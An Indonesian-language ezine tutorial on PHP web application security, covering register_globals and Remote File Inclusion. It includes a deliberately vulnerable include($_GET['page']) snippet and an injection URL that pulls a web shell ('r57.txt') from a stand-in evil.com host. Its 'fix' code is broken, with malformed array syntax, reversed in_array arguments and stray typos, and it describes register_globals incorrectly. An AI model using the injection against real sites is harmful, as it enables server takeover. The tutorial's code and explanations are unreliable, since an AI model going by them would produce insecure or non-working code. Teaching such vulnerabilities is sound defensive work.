Pendahuluan PHP adalah salahsatu bahasa pemrograman web yang pengguna dan penikmatnya cukup banyak 
di area cyberspace. dikarenakan bahasa web ini yang dinamis dan termasuk dalam opensource (info : 
http://php.net). PHP menjadi “ladang� pengaplikasian berbagai variabel yang ada dalam script secara 
autoglobal oleh programer dan juga menjadi “ladang� attacking para attacker karena PHP memiliki 
fasilitas autoglobal pada beberapa variabel :p

GET and POST Diawali dengan deklarasi variabel GET/POST yang berasal dari fasilitas autoglobal yang 
ada dalam PHP. variabel register_global yang tersetting “on� pada file php.ini berfungsi untuk 
membatasi variabel-variabel apa saja yang akan digunakan dalam script php. jika register_global on 
maka web admin tidak perlu spesifik dalam mendefinisikan variabel dan jika off. maka variabelpun 
harus di definisikan secara spesifik. seperti ini lah contoh script php nya :

----------------------------------------------------------------------- 
<?php 
echo $_POST['newhack']; //variabel newhack dikirim dengan methode POST 
?> 
-----------------------------------------------------------------------

dari sisi pengamanan settingan on lebih rawan daripada off. dikarenakan variabel-variabel yang 
dibatasi sangat minim. apabila kita settingan off maka effisiensi code sangat lah besar. jadi, 
pentingnya register_global sangat di utamakan dalam sebuah aplikasi web yang bertujuan dalam hal 
pengamanan.

Parameter Include Berhubungan dengan sub-bab diatas, fasilitas autoglobal pada PHP juga pasti 
berpengaruh pada parameter fungsi include(), require(), fopen() dan lain-lain. contoh variabel 
seperti itu dengan mudah dapat diisi dengan variabel GET/POST atau COOKIES/SESSION. karena pengaruh 
autoglobal itu sendiri.

saya akan memberikan contoh salah-satu bug yang berhubungan dengan variabel-variabel diatas. Remote 
File Inclusion, bug klasik (mungkin sekarang masih ada :p) yang digunakan untuk me-remote 
web/server si target. contoh script PHP :

-----------------------------------------------------------------------
<?php
$file =$_GET['page']; // contoh kita akan menginclude file galeri.php
include($file);
?>
-----------------------------------------------------------------------

tanpa sanitasi input dalam proses pengeksekusian $file =$_GET['page'];

http://www.site.com/index.php?page=galeri.php

maka attacker akan dengan mudah menginjek proses $file dengan evil scriptnya. contoh menjadi seperti ini

http://www.site.com/index.php?page=http://www.evil.com/r57.txt?

dan bila kita lihat source codenya akan menjadi seperti ini :

-----------------------------------------------------------------------
<?php
$file =�http://www.evil.com/r57.txt?�; / /$_GET['page'];
include($file);
?>
-----------------------------------------------------------------------

script $file akan menjadi script yang di injekan oleh si attacker. prosesnya seperti ini. pertama, 
awal dari bug ini adalah lagi-lagi fungsi dari include. fungsi ini berguna untuk menginclude 
(memasukan) file, yang disini telah dirubah menjadi file remote oleh si attacker. variabel fungsi 
yang sama terdapat pada include_once(), require(), require_once(). solusi dari bug ini sebenarnya 
sangat banyak. tapi bagi saya ada beberapa yang efisien digunakan. salah satunya dengan memasukan 
file yang sah di include ke array. contoh script seperti ini :

-----------------------------------------------------------------------
$file_valid = new array(“index�,�galeri�,�profil�);
$file = $_GET['page'];
if(!in_array($file_valid,$file)){$file = index;} // fungsi cek file
-----------------------------------------------------------------------

proses sederahananya seperti ini : $file_valid adalah variabel baru yang dimasukan ke array. lalu 
code selanjutnya adalah pengecekan ketika $file di injeksi oleh script attacker 
(www.evil.com/r57.txt) maka file tidak valid karena tidak ada dalam array $file_valid. lalu %file 
di ganti value (redirect) ke file index.php

Penutup Sebenarnya masih banyak lagi celah-celah keamanan pada aplikasi web berbasis PHP. dari 
mulai proses input query database, system(), passthry(), shellexec(), exec() dan lain-lain. atau 
pada database seperti MySQL, bug dijalankan melalui perintah-perintah yang bisa kita inputkan di 
web browser. tapi dalam artikel ini saya hanya mengenalkan beberapa celah keamanan yang cukup 
diperhitungkan kondisinya.

Refrensi
http://www.php.net
http://www.google.com (dork : security php)
http://www.go4expert.com/forum
KEAMANAN PADA APLIKASI WEB DENGAN PHP oleh ABD. THALIB
Dan lain-lain (lupa)
sumber: http://ezine.omega.or.id/2/pengenalan-celah-keamanan-pada-aplikasi-Web-berbasis-PHP.txt